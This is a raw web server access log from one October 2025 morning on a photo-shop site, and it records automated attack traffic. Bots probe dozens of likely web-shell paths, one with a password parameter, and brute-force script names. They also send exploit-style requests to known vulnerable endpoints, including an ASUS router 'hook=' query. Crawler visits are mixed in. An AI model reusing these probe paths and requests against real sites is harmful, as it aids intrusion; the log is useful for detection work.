185.11.167.13 - - [18/Oct/2025:09:31:08 -0400] "GET /wp-content/uploads/json.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:10 -0400] "GET /wp-content/themes/freeyanz/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:10 -0400] "GET /wp-content/themes/erapress/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:29:32 -0400] "GET /fwe.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:29:45 -0400] "GET /wp-content/11.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:09:29:25 -0400] "GET /products60922966?kg=0060180086 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:09:29:54 -0400] "GET /products32076396?kg=0031685303 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.11.167.13 - - [18/Oct/2025:09:29:59 -0400] "GET /.well-known/class.api.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:30:12 -0400] "GET /wp-content/class.api.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:30:13 -0400] "GET /.tmb/class.api.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:09:30:18 -0400] "GET /products199384344?kg=0196952909 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.11.167.13 - - [18/Oct/2025:09:30:39 -0400] "GET /.well-known/acme-challenge/class.api.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:29:21 -0400] "GET /brute.php HTTP/1.1" 503 854 "http://salhab360photos.com/brute.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:09:30:26 -0400] "GET /products60926360?kg=0060183437 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:30:50 -0400] "POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15"
185.11.167.13 - - [18/Oct/2025:09:30:52 -0400] "GET /wp-includes/class.api.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:31:01 -0400] "POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15"
185.11.167.13 - - [18/Oct/2025:09:31:13 -0400] "GET /wp-content/themes/panama/json.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:14 -0400] "GET /wp-content/themes/moog/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:14 -0400] "GET /wp-content/uploads/2023/11/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:14 -0400] "GET /wp-content/uploads/2023/12/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:15 -0400] "GET /wp-content/themes/blogai/issue.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:15 -0400] "GET /wp-content/themes/agwin/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:20 -0400] "GET /jetpack.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:09:31:27 -0400] "GET /products60919654?kg=0060176814 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:32:08 -0400] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.6"
185.11.167.13 - - [18/Oct/2025:09:32:12 -0400] "GET /xltavrat.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:32:21 -0400] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.6"
185.11.167.13 - - [18/Oct/2025:09:32:25 -0400] "GET /.wp-back.phP HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:32:31 -0400] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4"
185.11.167.13 - - [18/Oct/2025:09:32:38 -0400] "GET /wp-admin/fw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:32:42 -0400] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4"
157.20.32.210 - - [18/Oct/2025:09:32:55 -0400] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4"
185.11.167.13 - - [18/Oct/2025:09:32:55 -0400] "GET /autoload_classmap.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:09:33:10 -0400] "GET /odr/order/apiGetCartItems/ HTTP/1.1" 200 29109 "https://salhab360photos.com/products18716860?kg=0018488687" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:09:33:14 -0400] "GET /resource/js/json/megadrop_2015new.json HTTP/1.1" 200 34768 "https://salhab360photos.com/products18716860?kg=0018488687" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.11.167.13 - - [18/Oct/2025:09:33:21 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:33:22 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
185.11.167.13 - - [18/Oct/2025:09:33:21 -0400] "GET /wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
103.153.42.48 - - [18/Oct/2025:09:32:54 -0400] "POST /xmlrpc.php HTTP/1.1" 503 854 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
185.11.167.13 - - [18/Oct/2025:09:31:11 -0400] "GET /wp-content/plugins/doyanz/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:15 -0400] "GET /wp-content/themes/quext/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:31:14 -0400] "POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15"
185.11.167.13 - - [18/Oct/2025:09:31:19 -0400] "GET /wp-content/plugins/app-calendar/config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:20 -0400] "GET /wp-content/smm.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:33 -0400] "GET /ws.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:31:46 -0400] "GET /bala.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:31:57 -0400] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.6"
185.11.167.13 - - [18/Oct/2025:09:31:59 -0400] "GET /radio.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:30:57 -0400] "GET /bf.php HTTP/1.1" 200 0 "http://salhab360photos.com/bf.php" "Go-http-client/2.0"
185.11.167.13 - - [18/Oct/2025:09:32:51 -0400] "GET /wp-content/fw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:09:32:29 -0400] "GET /products60891642?kg=0060149144 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.107 - - [18/Oct/2025:09:32:49 -0400] "GET /products18716860?kg=0018488687 HTTP/1.1" 200 32174 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
157.20.32.210 - - [18/Oct/2025:09:33:11 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
185.11.167.13 - - [18/Oct/2025:09:33:08 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
93.170.136.138 - - [18/Oct/2025:09:33:27 -0400] "GET /?p=2452 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Windows 95) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/44.0.879.0 Safari/534.2"
157.20.32.210 - - [18/Oct/2025:09:33:30 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:33:35 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
185.11.167.13 - - [18/Oct/2025:09:33:34 -0400] "GET /wp-includes/js/tinymce/plugins/compat3x/css/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
173.252.70.14 - - [18/Oct/2025:09:33:53 -0400] "GET /robots.txt HTTP/1.1" 206 84 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
157.20.32.210 - - [18/Oct/2025:09:33:54 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:09:33:30 -0400] "GET /products60910092?kg=0060167367 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.11.167.13 - - [18/Oct/2025:09:33:47 -0400] "GET /.well-known/acme-challenge/xmrlpc.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:34:33 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:09:34:35 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:34:23 -0400] "GET /libraries/fof/database/iterator/xmrlpc.php?p= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:34:36 -0400] "GET /wp-content/style-css.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:34:31 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:34:44 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.153.42.48 - - [18/Oct/2025:09:33:52 -0400] "POST /xmlrpc.php HTTP/1.1" 503 854 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
20.171.207.254 - - [18/Oct/2025:09:34:34 -0400] "GET /products60939498?kg=0060196416 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.11.167.13 - - [18/Oct/2025:09:35:07 -0400] "GET /plugins/finder/categories/about.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:35:20 -0400] "GET /updates.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:35:28 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
142.44.228.85 - - [18/Oct/2025:09:35:36 -0400] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.11.167.13 - - [18/Oct/2025:09:35:33 -0400] "GET /wp-includes/rest-api/about.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:09:35:44 -0400] "GET /products146481734?kg=0144695454 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:09:34:57 -0400] "GET /wpbf.php HTTP/1.1" 503 854 "http://salhab360photos.com/wpbf.php" "Go-http-client/2.0"
185.11.167.13 - - [18/Oct/2025:09:35:46 -0400] "GET /wp-head.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:09:35:38 -0400] "GET /products60875734?kg=0060133430 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:33:41 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
51.79.229.86 - - [18/Oct/2025:09:32:37 -0400] "GET /cepmek.php HTTP/1.1" 503 854 "http://salhab360photos.com/cepmek.php" "Go-http-client/2.0"
185.11.167.13 - - [18/Oct/2025:09:34:00 -0400] "GET /.well-known/pki-validation/install.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:34:00 -0400] "GET /wp-config-sample.php HTTP/1.1" 500 1074 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:34:10 -0400] "GET /.well-known/pki-validation/atomlib.php HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:34:10 -0400] "GET /wp-includes/sodium_compat/src/Core32/Curve25519/Ge/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:34:20 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:34:39 -0400] "GET /wp-content/data-db.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:34:42 -0400] "GET /.well-known/wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:33:59 -0400] "GET /bruteforce.php HTTP/1.1" 503 854 "http://salhab360photos.com/bruteforce.php" "Go-http-client/2.0"
185.11.167.13 - - [18/Oct/2025:09:34:54 -0400] "GET /components/com_newsfeeds/models/indexx.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:35:04 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:35:15 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:35:58 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:36:00 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:09:35:56 -0400] "GET /products21298676?kg=0021039019 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:09:36:00 -0400] "POST /goform/setmac HTTP/1.1" 200 0 "https://salhab360photos.com/index.htmlr" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.19"
103.153.42.48 - - [18/Oct/2025:09:35:19 -0400] "POST /xmlrpc.php HTTP/1.1" 503 854 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; apetito Gruppe; rv:11.0) like Gecko"
157.20.32.210 - - [18/Oct/2025:09:36:11 -0400] "POST /goform/setmac HTTP/1.1" 200 0 "https://salhab360photos.com/index.htmlr" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.19"
18.130.209.75 - - [18/Oct/2025:09:36:24 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
185.11.167.13 - - [18/Oct/2025:09:35:59 -0400] "GET /thanks.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:36:21 -0400] "POST / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
206.189.247.132 - - [18/Oct/2025:09:36:24 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
157.20.32.210 - - [18/Oct/2025:09:36:24 -0400] "POST /goform/setmac HTTP/1.1" 200 0 "https://salhab360photos.com/index.htmlr" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.19"
92.222.104.220 - - [18/Oct/2025:09:36:04 -0400] "GET /products51904324?kg=0051271427 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.11.167.13 - - [18/Oct/2025:09:36:38 -0400] "GET /wp-content/themes/finley/min.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
185.11.167.13 - - [18/Oct/2025:09:36:39 -0400] "GET /wp-content/themes/welfare-charity/www.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:09:36:32 -0400] "GET /products49979906?kg=0049370476 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:09:36:34 -0400] "GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1" 200 0 "https://salhab360photos.com" "asusrouter--"
45.133.172.44 - - [18/Oct/2025:09:36:49 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
157.20.32.210 - - [18/Oct/2025:09:36:47 -0400] "GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1" 200 0 "https://salhab360photos.com" "asusrouter--"
185.11.167.13 - - [18/Oct/2025:09:36:52 -0400] "GET /xl2023.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
